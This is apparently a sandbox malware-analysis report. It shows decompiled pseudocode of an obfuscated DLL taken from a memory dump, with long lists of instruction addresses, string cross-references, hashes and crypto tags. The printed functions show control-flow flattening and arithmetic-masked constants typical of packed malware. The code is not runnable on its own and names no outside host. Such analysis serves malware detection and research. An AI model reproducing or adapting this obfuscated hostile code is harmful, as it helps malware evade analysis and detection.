										_t297 = _t414 + 0x74; // 0x74
										_t398 = _t297;
										_t368 = _v252;
										_t415 = 0x3b15e045;
										_v120 = _a4;
										_v248 = _t297;
										_v124 =  *((intOrPtr*)(_t366 + 4)) - 0x74;
										goto L2;
									}
								} else {
									if(_t415 != 0x3b15e045) {
										goto L32;
									} else {
										_t360 =  *0x10020400; // 0x0
										_t362 = E100072A4(_v184,  &_v128, _v220, _v228, _t368, _v136,  *_t360);
										_t424 = _t424 + 0x18;
										asm("sbb esi, esi");
										_t415 = ( ~_t362 & 0x10bb2f71) + 0x15dfcb81;
										goto L9;
									}
								}
							}
						}
						break;
						L32:
						_t398 = _v248;
					} while (_t415 != 0x1160f48c);
					L33:
					return _v252;
					goto L34;
				}
			}

0x1001aa82
0x1001aa8c
0x1001aa8d
0x1001aa94
0x1001aa96
0x1001aa97
0x1001aa98
0x1001aa9d
0x1001aaa5
0x1001aaae
0x1001aab0
0x1001aab5
0x1001aabb
0x1001aac0
0x1001aaca
0x1001aacd
0x1001aad1
0x1001aad6
0x1001aadb
0x1001aae3
0x1001aaeb
0x1001aaf0
0x1001aaf8
0x1001ab00
0x1001ab08
0x1001ab10
0x1001ab18
0x1001ab20
0x1001ab28
0x1001ab30
0x1001ab38
0x1001ab40
0x1001ab48
0x1001ab4d
0x1001ab55
0x1001ab5d
0x1001ab65
0x1001ab6d
0x1001ab72
0x1001ab7a
0x1001ab82
0x1001ab8a
0x1001ab8f
0x1001ab97
0x1001ab9f
0x1001aba7
0x1001abaf
0x1001abb7
0x1001abbf
0x1001abc7
0x1001abcf
0x1001abd3
0x1001abdb
0x1001abe3
0x1001abf6
0x1001abfd
0x1001ac08
0x1001ac10
0x1001ac18
0x1001ac20
0x1001ac2d
0x1001ac31
0x1001ac39
0x1001ac44
0x1001ac4f
0x1001ac5a
0x1001ac67
0x1001ac6d
0x1001ac72
0x1001ac7a
0x1001ac82
0x1001ac8a
0x1001ac98
0x1001ac9d
0x1001aca3
0x1001acab
0x1001acb3
0x1001acbb
0x1001acc3
0x1001accb
0x1001acd8
0x1001acdb
0x1001acdf
0x1001ace7
0x1001acef
0x1001acf4
0x1001acfc
0x1001ad01
0x1001ad09
0x1001ad1f
0x1001ad26
0x1001ad31
0x1001ad3d
0x1001ad42
0x1001ad48
0x1001ad50
0x1001ad55
0x1001ad5d
0x1001ad65
0x1001ad6d
0x1001ad79
0x1001ad7e
0x1001ad84
0x1001ad8c
0x1001ad94
0x1001ad9c
0x1001ada1
0x1001ada9
0x1001adb1
0x1001adb9
0x1001adc1
0x1001adc9
0x1001add5
0x1001adda
0x1001ade0
0x1001ade8
0x1001adf0
0x1001ae02
0x1001ae05
0x1001ae0c
0x1001ae17
0x1001ae27
0x1001ae2a
0x1001ae31
0x1001ae35
0x1001ae3d
0x1001ae45
0x1001ae4d
0x1001ae52
0x1001ae5a
0x1001ae62
0x1001ae6a
0x1001ae72
0x1001ae7a
0x1001ae82
0x1001ae8a
0x1001ae92
0x1001ae9a
0x1001ae9a
0x1001ae9a
0x1001ae9e
0x1001ae9e
0x1001ae9e
0x1001ae9e
0x1001aea4
0x00000000
0x00000000
0x1001aeaa
0x1001b031
0x1001b037
0x00000000
0x1001aeb0
0x1001aeb6
0x1001afa5
0x1001afb9
0x1001afd8
0x1001afe8
0x1001afed
0x1001aff2
0x1001b018
0x1001aff4
0x1001aff4
0x1001affb
0x1001affd
0x1001afff
0x1001b001
0x1001b002
0x1001b00a
0x1001b00e
0x1001b00e
0x00000000
0x1001aebc
0x1001aec2
0x1001af94
0x00000000
0x1001aec8
0x1001aece
0x1001af41
0x1001af68
0x1001af6b
0x1001af70
0x1001af74
0x1001af77
0x1001af7d
0x00000000
0x1001af83
0x1001af85
0x1001af8a
0x1001af8b
0x00000000
0x1001af8b
0x00000000
0x1001aed0
0x1001aed6
0x00000000
0x1001aedc
0x1001aedc
0x1001af13
0x1001af18
0x1001af1f
0x1001af27
0x1001af2d
0x1001af2d
0x1001ae9a
0x1001ae9a
0x1001ae9a
0x00000000
0x1001ae9a
0x1001ae9a
0x1001aed6
0x1001aece
0x1001aec2
0x1001aeb6
0x00000000
0x1001aeaa
0x1001b047
0x1001b12b
0x1001b137
0x1001b13d
0x1001b13d
0x1001b141
0x00000000
0x1001b04d
0x1001b053
0x1001b117
0x1001b11c
0x1001b11f
0x00000000
0x1001b059
0x1001b05f
0x1001b0b2
0x1001b0b5
0x1001b0ba
0x1001b0ba
0x1001b0c0
0x1001b0ce
0x1001b0d4
0x1001b0d6
0x1001b0db
0x1001b0e0
0x1001b0e0
0x1001b0e3
0x1001b0e7
0x1001b0ec
0x1001b0f9
0x1001b0fd
0x00000000
0x1001b0fd
0x1001b061
0x1001b067
0x00000000
0x1001b06d
0x1001b06d
0x1001b090
0x1001b095
0x1001b09c
0x1001b0a4
0x00000000
0x1001b0a4
0x1001b067
0x1001b05f
0x1001b053
0x00000000
0x1001b146
0x1001b146
0x1001b14a
0x1001b156
0x1001b164
0x00000000
0x1001b164

Strings

"O, xrefs: 1001AD6D
2, xrefs: 1001AC5A
v, xrefs: 1001ADE8
i, xrefs: 1001AD26
!}, xrefs: 1001AE5A
{T, xrefs: 1001AE35
Ma, xrefs: 1001AC31
/kJ, xrefs: 1001ABD3
vZ, xrefs: 1001AB4D
l, xrefs: 1001AFA5

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: /kJ$!}$"O$2$l$vZ$v${T$Ma$i
API String ID: 0-820926959
Opcode ID: 7980954552429351a372db50dab4b6f218cdb8a3472dcb956adba1ecf043f13f
Instruction ID: f030582bbcc1f069af4cc1513c7b4e4781258d7c525ea4dea27bb053ea4ed05b
Opcode Fuzzy Hash: 7980954552429351a372db50dab4b6f218cdb8a3472dcb956adba1ecf043f13f
Instruction Fuzzy Hash: EF0236725083809FE364CF25C885A4BBBE1FBC5354F108A1DF5E99A260D7B5D94ACF42

Uniqueness

Uniqueness Score: -1.00%

Function 10009106 Relevance: 12.8, Strings: 10, Instructions: 328
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E10009106(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int* _a16) {
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* __ecx;
				void* _t286;
				signed int _t335;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				void* _t354;
				signed int* _t397;
				signed int* _t401;
				void* _t404;

				_t398 = _a12;
				_t397 = _a16;
				_push(_t397);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E10012550(_t286);
				_v72 = 0x2367;
				_t401 =  &(( &_v172)[6]);
				_v72 = _v72 | 0x097ad610;
				_v72 = _v72 ^ 0x097ae8e2;
				_t354 = 0x1dc5535c;
				_v92 = 0x56dc;
				_v92 = _v92 + 0xce73;
				_v92 = _v92 ^ 0x000174de;
				_v108 = 0x5b94;
				_v108 = _v108 ^ 0x203ddd03;
				_v108 = _v108 << 0xa;
				_v108 = _v108 ^ 0xf61a093d;
				_v140 = 0x3ec5;
				_t342 = 0x2d;
				_v140 = _v140 / _t342;
				_v140 = _v140 + 0xffff0d7c;
				_t343 = 0x54;
				_v140 = _v140 * 0x56;
				_v140 = _v140 ^ 0xffae99ec;
				_v100 = 0x56eb;
				_v100 = _v100 + 0xbf92;
				_v100 = _v100 + 0xffffb004;
				_v100 = _v100 ^ 0x0000e62d;
				_v124 = 0xb6af;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 / _t343;
				_v124 = _v124 ^ 0x0000233e;
				_v120 = 0xde2;
				_t54 =  &_v120; // 0xde2
				_t344 = 0x4c;
				_v120 =  *_t54 / _t344;
				_v120 = _v120 * 0x3f;
				_v120 = _v120 ^ 0x00006eff;
				_v104 = 0xa720;
				_v104 = _v104 * 0x69;
				_v104 = _v104 + 0x1686;
				_v104 = _v104 ^ 0x0044923c;
				_v112 = 0xb3bf;
				_v112 = _v112 >> 1;
				_v112 = _v112 >> 0xc;
				_v112 = _v112 ^ 0x00005d19;
				_v96 = 0x2a95;
				_v96 = _v96 >> 6;
				_v96 = _v96 + 0xbf11;
				_v96 = _v96 ^ 0x0000bd99;
				_v148 = 0xc1fd;
				_v148 = _v148 << 0xc;
				_v148 = _v148 * 0x31;
				_v148 = _v148 << 5;
				_v148 = _v148 ^ 0x42da2451;
				_v160 = 0xd54a;
				_t345 = 0x17;
				_v160 = _v160 / _t345;
				_v160 = _v160 | 0x2f8e477c;
				_v160 = _v160 + 0xffff9d16;
				_v160 = _v160 ^ 0x2f8dc8af;
				_v168 = 0x5d03;
				_v168 = _v168 + 0xffffafa9;
				_v168 = _v168 + 0xffff8780;
				_v168 = _v168 | 0x25100a61;
				_v168 = _v168 ^ 0xfffffc23;
				_v116 = 0x4d25;
				_t346 = 0x4a;
				_v116 = _v116 / _t346;
				_t347 = 0x45;
				_v116 = _v116 / _t347;
				_v116 = _v116 ^ 0x00001bc5;
				_v152 = 0xf56f;
				_v152 = _v152 >> 0xc;
				_v152 = _v152 + 0xffff6840;
				_v152 = _v152 | 0xadc68f8a;
				_v152 = _v152 ^ 0xffffbd08;
				_v172 = 0xb7ce;
				_v172 = _v172 >> 9;
				_v172 = _v172 >> 4;
				_v172 = _v172 << 0xd;
				_v172 = _v172 ^ 0x0000b2e5;
				_v80 = 0x57d2;
				_v80 = _v80 ^ 0xaa637a5b;
				_v80 = _v80 ^ 0xaa6340a6;
				_v156 = 0xb744;
				_v156 = _v156 + 0x63ef;
				_t348 = 0x7c;
				_v156 = _v156 / _t348;
				_v156 = _v156 ^ 0xd73448d2;
				_v156 = _v156 ^ 0xd7344e9f;
				_v132 = 0x174e;
				_t349 = 0x78;
				_v132 = _v132 * 0x65;
				_v132 = _v132 | 0x3b954933;
				_v132 = _v132 ^ 0xbecd0e21;
				_v132 = _v132 ^ 0x85504ce6;
				_v164 = 0x7af9;
				_v164 = _v164 << 9;
				_v164 = _v164 >> 7;
				_v164 = _v164 * 0x41;
				_v164 = _v164 ^ 0x007cf7ff;
				_v136 = 0x7571;
				_v136 = _v136 + 0xffff8152;
				_v136 = _v136 | 0x8539ecc8;
				_v136 = _v136 / _t349;
				_v136 = _v136 ^ 0x022226c3;
				_v88 = 0xe259;
				_v88 = _v88 * 0x74;
				_v88 = _v88 ^ 0x0066854f;
				_v144 = 0x1b27;
				_v144 = _v144 >> 0xd;
				_v144 = _v144 * 0x66;
				_v144 = _v144 >> 0xb;
				_v144 = _v144 ^ 0x00005892;
				_v76 = 0x4fda;
				_v76 = _v76 ^ 0xefbec303;
				_v76 = _v76 ^ 0xefbe9eae;
				_v84 = 0x12ec;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0x0012dc80;
				_v128 = 0x576c;
				_t350 = 0x3e;
				_v128 = _v128 / _t350;
				_t351 = 0x79;
				_v128 = _v128 / _t351;
				_v128 = _v128 + 0x759e;
				_v128 = _v128 ^ 0x000075a0;
				goto L1;
				do {
					while(1) {
						L1:
						_t404 = _t354 - 0x1cceac70;
						if(_t404 > 0) {
							break;
						}
						if(_t404 == 0) {
							E1000F834( *((intOrPtr*)(_t398 + 0xc)), _v160,  &_v68, _v168);
							_t401 =  &(_t401[2]);
							_t354 = 0x326fdce7;
							continue;
						} else {
							if(_t354 == 0x828a2c) {
								E1000F834( *((intOrPtr*)(_t398 + 0x14)), _v172,  &_v68, _v80);
								_t401 =  &(_t401[2]);
								_t354 = 0x10364e2a;
								continue;
							} else {
								if(_t354 == 0xc083f5a) {
									E1000FEE3(_t397,  &_v68, _v108, _v140, _v100, _v124);
									_t401 =  &(_t401[4]);
									_t354 = 0x223ac297;
									continue;
								} else {
									if(_t354 == 0x10364e2a) {
										E1000BAD2(_v156, _v132, __eflags, _t398 + 0x18,  &_v68, _v164);
										_t401 =  &(_t401[3]);
										_t354 = 0x1e572357;
										continue;
									} else {
										if(_t354 == 0x17d7bd79) {
											E1000F834( *((intOrPtr*)(_t398 + 8)), _v96,  &_v68, _v148);
											_t401 =  &(_t401[2]);
											_t354 = 0x1cceac70;
											continue;
										} else {
											if(_t354 == 0x18be4013) {
												_push(_t354);
												_t335 = E100054FB(_t397[1]);
												 *_t397 = _t335;
												__eflags = _t335;
												if(__eflags != 0) {
													_t354 = 0xc083f5a;
													continue;
												}
											} else {
												if(_t354 != 0x19774c23) {
													goto L28;
												} else {
													E1000F834( *((intOrPtr*)(_t398 + 0x28)), _v76,  &_v68, _v84);
												}
											}
										}
									}
								}
							}
						}
						L10:
						return 0 |  *_t397 != 0x00000000;
					}
					__eflags = _t354 - 0x1dc5535c;
					if(_t354 == 0x1dc5535c) {
						_t354 = 0x210e94e8;
						 *_t397 =  *_t397 & 0x00000000;
						__eflags =  *_t397;
						_t397[1] = _v128;
						goto L28;
					} else {
						__eflags = _t354 - 0x1e572357;
						if(__eflags == 0) {
							E1000BAD2(_v136, _v88, __eflags, _t398 + 0x20,  &_v68, _v144);
							_t401 =  &(_t401[3]);
							_t354 = 0x19774c23;
							goto L1;
						} else {
							__eflags = _t354 - 0x210e94e8;
							if(_t354 == 0x210e94e8) {
								_t397[1] = E1001DBC4(_t398);
								_t354 = 0x18be4013;
								goto L1;
							} else {
								__eflags = _t354 - 0x223ac297;
								if(__eflags == 0) {
									E1000BAD2(_v120, _v104, __eflags, _t398,  &_v68, _v112);
									_t401 =  &(_t401[3]);
									_t354 = 0x17d7bd79;
									goto L1;
								} else {
									__eflags = _t354 - 0x326fdce7;
									if(_t354 != 0x326fdce7) {
										goto L28;
									} else {
										E1000F834( *((intOrPtr*)(_t398 + 0x10)), _v116,  &_v68, _v152);
										_t401 =  &(_t401[2]);
										_t354 = 0x828a2c;
										goto L1;
									}
								}
							}
						}
					}
					goto L10;
					L28:
					__eflags = _t354 - 0x3b76f47b;
				} while (__eflags != 0);
				goto L10;
			}

0x1000910f
0x10009117
0x1000911e
0x1000911f
0x10009120
0x10009127
0x1000912e
0x10009130
0x10009135
0x10009140
0x10009143
0x1000914d
0x10009155
0x1000915a
0x10009162
0x1000916a
0x10009172
0x1000917a
0x10009182
0x10009187
0x1000918f
0x1000919d
0x100091a2
0x100091a8
0x100091b5
0x100091b8
0x100091bc
0x100091c4
0x100091cc
0x100091d4
0x100091dc
0x100091e4
0x100091ec
0x100091f9
0x100091fd
0x10009205
0x1000920d
0x10009211
0x10009214
0x1000921d
0x10009221
0x10009229
0x10009236
0x1000923a
0x10009242
0x1000924a
0x10009252
0x10009256
0x1000925b
0x10009263
0x1000926b
0x10009270
0x10009278
0x10009280
0x10009288
0x10009292
0x10009296
0x1000929b
0x100092a5
0x100092b3
0x100092b8
0x100092be
0x100092c6
0x100092ce
0x100092d6
0x100092de
0x100092e6
0x100092ee
0x100092f6
0x100092fe
0x1000930a
0x1000930f
0x10009319
0x1000931e
0x10009324
0x1000932c
0x10009334
0x10009339
0x10009341
0x10009349
0x10009351
0x10009359
0x1000935e
0x10009363
0x10009368
0x10009370
0x10009378
0x10009380
0x10009388
0x10009390
0x1000939c
0x100093a1
0x100093a7
0x100093af
0x100093b7
0x100093c4
0x100093c5
0x100093c9
0x100093d1
0x100093d9
0x100093e1
0x100093e9
0x100093ee
0x100093f8
0x100093fc
0x10009404
0x1000940c
0x10009414
0x10009422
0x10009426
0x1000942e
0x1000943b
0x1000943f
0x10009447
0x1000944f
0x10009459
0x1000945d
0x10009462
0x1000946a
0x10009474
0x10009481
0x10009489
0x10009491
0x10009496
0x1000949e
0x100094ac
0x100094b1
0x100094bb
0x100094c3
0x100094c7
0x100094cf
0x100094cf
0x100094d7
0x100094d7
0x100094d7
0x100094d7
0x100094d9
0x00000000
0x00000000
0x100094df
0x1000960a
0x1000960f
0x10009612
0x00000000
0x100094e5
0x100094eb
0x100095e8
0x100095ed
0x100095f0
0x00000000
0x100094f1
0x100094f3
0x100095c6
0x100095cb
0x100095ce
0x00000000
0x100094f9
0x100094ff
0x1000959e
0x100095a3
0x100095a6
0x00000000
0x10009505
0x1000950b
0x1000957a
0x1000957f
0x10009582
0x00000000
0x1000950d
0x10009513
0x10009556
0x10009557
0x1000955c
0x1000955f
0x10009561
0x10009563
0x00000000
0x10009563
0x10009515
0x1000951b
0x00000000
0x10009521
0x10009531
0x10009536
0x1000951b
0x10009513
0x1000950b
0x100094ff
0x100094f3
0x100094eb
0x10009539
0x1000954a
0x1000954a
0x1000961c
0x10009622
0x100096d1
0x100096d6
0x100096d6
0x100096d9
0x00000000
0x10009628
0x10009628
0x1000962e
0x100096bb
0x100096c0
0x100096c3
0x00000000
0x10009630
0x10009630
0x10009636
0x10009699
0x1000969c
0x00000000
0x10009638
0x10009638
0x1000963e
0x10009680
0x10009685
0x10009688
0x00000000
0x10009640
0x10009640
0x10009646
0x00000000
0x1000964c
0x1000965c
0x10009661
0x10009664
0x00000000
0x10009664
0x10009646
0x1000963e
0x10009636
0x1000962e
0x00000000
0x100096dc
0x100096dc
0x100096dc
0x00000000

Strings

>#, xrefs: 1000920D
>#, xrefs: 100091FD
-, xrefs: 100091DC
g#, xrefs: 10009135
lW, xrefs: 1000949E
c, xrefs: 10009390
qu, xrefs: 10009404
Y, xrefs: 1000942E
%M, xrefs: 100092FE
z, xrefs: 1000914D

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: %M$-$>#$Y$g#$lW$qu$>#$c$z
API String ID: 0-2374964813
Opcode ID: de3c8303d3afa683ad230a9c6f16e67f513d3a93420d356ad213b772e6f8532c
Instruction ID: a04e8cdbad16926697b1cdeed72c78a8b98b5098143ac3f4142bb92a13dbc873
Opcode Fuzzy Hash: de3c8303d3afa683ad230a9c6f16e67f513d3a93420d356ad213b772e6f8532c
Instruction Fuzzy Hash: 2DE131B1509741DFE364CF61C88991FBBE1EBC4788F108A1DF299862A4D7B9D909CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10004D90 Relevance: 12.8, Strings: 10, Instructions: 326
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10004D90() {
				char _v524;
				unsigned int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _t364;
				intOrPtr _t367;
				void* _t372;
				char _t382;
				void* _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int* _t425;

				_t425 =  &_v700;
				_v664 = 0x9fa1;
				_v664 = _v664 >> 0xf;
				_t372 = 0x3b39200;
				_v664 = _v664 + 0x495e;
				_v664 = _v664 * 0x17;
				_t412 = 0;
				_v664 = _v664 ^ 0x00069788;
				_v604 = 0xceb5;
				_v604 = _v604 >> 0xd;
				_v604 = _v604 ^ 0x00000106;
				_v624 = 0xb514;
				_v624 = _v624 + 0xffffa476;
				_push("true");
				_pop(_t413);
				_v624 = _v624 * 0x46;
				_v624 = _v624 ^ 0x00187a00;
				_v668 = 0x7309;
				_v668 = _v668 * 0x23;
				_v668 = _v668 >> 3;
				_v668 = _v668 ^ 0x5792a418;
				_v668 = _v668 ^ 0x57934680;
				_v676 = 0x9940;
				_v676 = _v676 + 0xffff3182;
				_v676 = _v676 / _t413;
				_t414 = 0x57;
				_v676 = _v676 / _t414;
				_v676 = _v676 ^ 0x0023e38f;
				_v700 = 0xa5bb;
				_v700 = _v700 | 0x2eb34f51;
				_t415 = 0x69;
				_v700 = _v700 / _t415;
				_v700 = _v700 + 0xffff1835;
				_v700 = _v700 ^ 0x00708bbe;
				_v640 = 0x8462;
				_t416 = 0x31;
				_v640 = _v640 / _t416;
				_v640 = _v640 | 0xf5b8cac2;
				_v640 = _v640 ^ 0xf5b8b775;
				_v644 = 0x4c0;
				_v644 = _v644 + 0xfffff031;
				_v644 = _v644 << 0xf;
				_v644 = _v644 ^ 0xfa78cc6a;
				_v576 = 0x47f3;
				_v576 = _v576 | 0x1c217342;
				_v576 = _v576 ^ 0x1c214363;
				_v600 = 0x6198;
				_v600 = _v600 << 5;
				_v600 = _v600 ^ 0x000c7289;
				_v632 = 0xa609;
				_v632 = _v632 + 0xaff1;
				_v632 = _v632 + 0xffff061b;
				_v632 = _v632 ^ 0x0000381f;
				_v584 = 0x236b;
				_v584 = _v584 | 0x1d93d101;
				_v584 = _v584 ^ 0x1d9382a6;
				_v580 = 0xb44f;
				_v580 = _v580 ^ 0x84ec8f50;
				_v580 = _v580 ^ 0x84ec3805;
				_v592 = 0x2849;
				_v592 = _v592 >> 8;
				_v592 = _v592 ^ 0x00006208;
				_v684 = 0xffa5;
				_v684 = _v684 >> 4;
				_t417 = 0xb;
				_v684 = _v684 * 0x1c;
				_v684 = _v684 << 0xc;
				_v684 = _v684 ^ 0x1bf5e695;
				_v692 = 0x7e89;
				_v692 = _v692 + 0x2efa;
				_v692 = _v692 / _t417;
				_v692 = _v692 + 0x2a18;
				_v692 = _v692 ^ 0x000064a1;
				_v596 = 0xa252;
				_t418 = 0x59;
				_v596 = _v596 * 9;
				_v596 = _v596 ^ 0x0005d303;
				_v680 = 0xbeb4;
				_v680 = _v680 >> 2;
				_v680 = _v680 + 0x1673;
				_v680 = _v680 + 0x7062;
				_v680 = _v680 ^ 0x0000a375;
				_v648 = 0x506f;
				_v648 = _v648 >> 0xd;
				_v648 = _v648 / _t418;
				_v648 = _v648 ^ 0x00002d61;
				_v656 = 0xa4c4;
				_t419 = 0x3f;
				_v656 = _v656 / _t419;
				_v656 = _v656 ^ 0xb08d55bb;
				_v656 = _v656 + 0x38bc;
				_v656 = _v656 ^ 0xb08d947f;
				_v688 = 0x4e3f;
				_v688 = _v688 >> 8;
				_v688 = _v688 >> 4;
				_t420 = 0x52;
				_v688 = _v688 / _t420;
				_v688 = _v688 ^ 0x00004d88;
				_v672 = 0x8701;
				_v672 = _v672 >> 9;
				_t421 = 0x24;
				_v672 = _v672 * 7;
				_v672 = _v672 >> 0xe;
				_v672 = _v672 ^ 0x000031cf;
				_v636 = 0x4a3c;
				_v636 = _v636 >> 0xa;
				_v636 = _v636 / _t421;
				_v636 = _v636 ^ 0x00005769;
				_v612 = 0x66c7;
				_v612 = _v612 << 0xc;
				_v612 = _v612 ^ 0x7aee3ef9;
				_v612 = _v612 ^ 0x7c821959;
				_v628 = 0x44bc;
				_v628 = _v628 << 0xb;
				_v628 = _v628 << 4;
				_v628 = _v628 ^ 0x225e6a59;
				_v696 = 0xf2f9;
				_t422 = 0x36;
				_v696 = _v696 / _t422;
				_v696 = _v696 << 4;
				_v696 = _v696 << 7;
				_v696 = _v696 ^ 0x0023cdd9;
				_v652 = 0xfa07;
				_v652 = _v652 ^ 0xfb6d8595;
				_v652 = _v652 | 0xb1ef9277;
				_v652 = _v652 * 0x2f;
				_v652 = _v652 ^ 0x410fad88;
				_v608 = 0x638e;
				_v608 = _v608 * 0x64;
				_v608 = _v608 ^ 0x0026a181;
				_v660 = 0xd0ef;
				_v660 = _v660 << 0xc;
				_v660 = _v660 + 0xdc19;
				_v660 = _v660 << 0xc;
				_v660 = _v660 ^ 0xfcc19d1e;
				_t371 = _v608;
				_v616 = 0x9e76;
				_v616 = _v616 + 0xffffc7b8;
				_v616 = _v616 + 0xb6c0;
				_v616 = _v616 ^ 0x000153b0;
				_v588 = 0xaa15;
				_v588 = _v588 >> 0x10;
				_v620 = 0x4821;
				_v620 = _v620 >> 0xb;
				_v620 = _v620 ^ 0xbb1b7ef2;
				_v620 = _v620 ^ 0xbb1b7ef8;
				do {
					while(_t372 != 0x3b39200) {
						if(_t372 == 0x724dd21) {
							E10014291(_v624, _v668,  &_v572, _v676);
							_t372 = 0x23ca7f5b;
							continue;
						} else {
							if(_t372 == 0x1549ba03) {
								_push(0x100012d8);
								_push(_v576);
								_push(_v644);
								E1000A4D7(__eflags, _v632, _v584, _v580, _v592, E10005DFC(_v700, _v640, __eflags),  *0x10021088 + 0x254,  &_v524,  *0x10021088 + 0x38);
								E10010D6D(_v684, _v692, _v596, _t356);
								_t425 =  &(_t425[0xd]);
								_t372 = 0x2c137c18;
								continue;
							} else {
								if(_t372 == 0x23ca7f5b) {
									_v572 = _v572 - E100047EB();
									_t372 = 0x1549ba03;
									asm("sbb [esp+0x94], edx");
									continue;
								} else {
									if(_t372 == 0x2c137c18) {
										_push(_t372);
										_t364 = E1001C0C8(_v664, _v604, _v680,  &_v524, _v648, _v656, 0, _v688, _t372, _v620, _v672);
										_t371 = _t364;
										_t425 =  &(_t425[0xa]);
										__eflags = _t364 - 0xffffffff;
										if(__eflags != 0) {
											_t372 = 0x32dad644;
											continue;
										}
									} else {
										if(_t372 == 0x2cffd5ae) {
											E1000F1ED(_v652, _v608, _v660, _v616, _t371);
										} else {
											if(_t372 != 0x32dad644) {
												goto L15;
											} else {
												_t382 = _v572;
												_t367 = _v568;
												_push(_t382);
												_v560 = _t367;
												_v552 = _t367;
												_v544 = _t367;
												_v536 = _t367;
												_v532 = _v588;
												_v564 = _t382;
												_v556 = _t382;
												_v548 = _t382;
												_v540 = _t382;
												E100141CA(_t371, _v636, _v612, _v628,  &_v564, _t382, _v696);
												_t425 =  &(_t425[6]);
												_t412 =  !=  ? 1 : _t412;
												_t372 = 0x2cffd5ae;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t412;
					}
					_t372 = 0x724dd21;
					L15:
					__eflags = _t372 - 0x140d4499;
				} while (__eflags != 0);
				goto L18;
			}

0x10004d90
0x10004d96
0x10004da0
0x10004da5
0x10004daa
0x10004dbb
0x10004dbf
0x10004dc1
0x10004dc9
0x10004dd1
0x10004dd6
0x10004dde
0x10004de6
0x10004df3
0x10004df5
0x10004df8
0x10004dfc
0x10004e04
0x10004e11
0x10004e15
0x10004e1a
0x10004e22
0x10004e2a
0x10004e32
0x10004e42
0x10004e4a
0x10004e4f
0x10004e55
0x10004e5d
0x10004e65
0x10004e71
0x10004e76
0x10004e7c
0x10004e84
0x10004e8c
0x10004e98
0x10004e9b
0x10004e9f
0x10004ea7
0x10004eaf
0x10004eb7
0x10004ebf
0x10004ec4
0x10004ecc
0x10004ed7
0x10004ee2
0x10004eed
0x10004ef5
0x10004efa
0x10004f02
0x10004f0a
0x10004f12
0x10004f1a
0x10004f22
0x10004f2d
0x10004f38
0x10004f43
0x10004f4e
0x10004f59
0x10004f64
0x10004f6c
0x10004f73
0x10004f7b
0x10004f83
0x10004f8f
0x10004f92
0x10004f96
0x10004f9b
0x10004fa3
0x10004fab
0x10004fbb
0x10004fbf
0x10004fc7
0x10004fcf
0x10004fdc
0x10004fdf
0x10004fe3
0x10004feb
0x10004ff3
0x10004ff8
0x10005000
0x10005008
0x10005010
0x10005018
0x10005025
0x10005029
0x10005031
0x1000503d
0x10005042
0x10005048
0x10005050
0x10005058
0x10005060
0x10005068
0x1000506d
0x10005076
0x1000507b
0x10005081
0x10005089
0x10005091
0x1000509b
0x1000509c
0x100050a0
0x100050a5
0x100050ad
0x100050b5
0x100050c0
0x100050c4
0x100050cc
0x100050d4
0x100050d9
0x100050e1
0x100050e9
0x100050f1
0x100050f6
0x100050fb
0x10005103
0x10005118
0x1000511b
0x1000511f
0x10005124
0x10005129
0x10005131
0x10005139
0x10005141
0x1000514e
0x10005152
0x1000515a
0x10005167
0x1000516b
0x10005173
0x1000517b
0x10005180
0x10005188
0x1000518d
0x10005195
0x10005199
0x100051a1
0x100051a9
0x100051b1
0x100051b9
0x100051c4
0x100051da
0x100051e2
0x100051e7
0x100051ef
0x100051f7
0x100051f7
0x10005205
0x100053d1
0x100053d8
0x00000000
0x1000520b
0x10005211
0x1000533a
0x1000533f
0x10005346
0x10005396
0x100053ab
0x100053b0
0x100053b3
0x00000000
0x10005217
0x1000521d
0x10005322
0x10005329
0x1000532e
